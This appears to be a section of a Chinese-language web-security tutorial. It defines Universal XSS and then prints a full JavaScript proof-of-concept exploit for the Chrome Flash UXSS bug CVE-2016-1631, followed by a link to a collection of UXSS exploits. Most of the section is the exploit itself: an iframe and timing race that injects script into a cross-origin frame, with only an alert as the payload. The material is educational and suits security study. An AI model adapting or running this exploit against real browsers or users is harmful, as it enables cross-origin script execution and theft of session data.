1.3.11 Uxss

UXSS全称Universal Cross-Site Scripting，翻译过来就是通用型XSS，也叫Universal XSS。

以Chrome浏览器Flash message loop 使用不当导致UXSS漏洞（CVE-2016-1631）为例

POC如下

var c0 = 0;
var c1 = 0;
var fs = [];
function cp() {
  ++c0;
}
for (var a = 0; a < 10; a++) {
  var i = document.documentElement.appendChild(document.createElement('iframe'));
  i.src = 'p.swf';
  fs.push(i);
}
function ml() {
  var pw = fs.pop().contentWindow;
  pw.name = 'p' + fs.length;
  pw.document.querySelector('embed').f();
  var a = document.createElement('a');
  a.href = 'about:blank';
  a.target = 'p' + fs.length;
  a.click();
  if (fs.length < 6) {
    var then = Date.now();
    while (Date.now() - then < 1000) {}
  }
}
function f() {
  if (++c1 == 2) {
    var x1 = x.contentWindow[0].frameElement.nextSibling;
    x1.src = 'https://abc.xyz';
    try {
      while (x1.contentDocument) { ml(); }
    } catch(e) {
      x1.src = '[removed]if(location!="about:blank")alert([removed])';
    }
  }
}
function c() {
  if (c0 == 10) {
    clearInterval(t);
    x = document.documentElement.appendChild(document.createElement('iframe'));
    x.src = 'f.html';
  }
}
var t = setInterval(c, 100);

一个致力于收集uxss的数据库

https://github.com/Metnew/uxss-db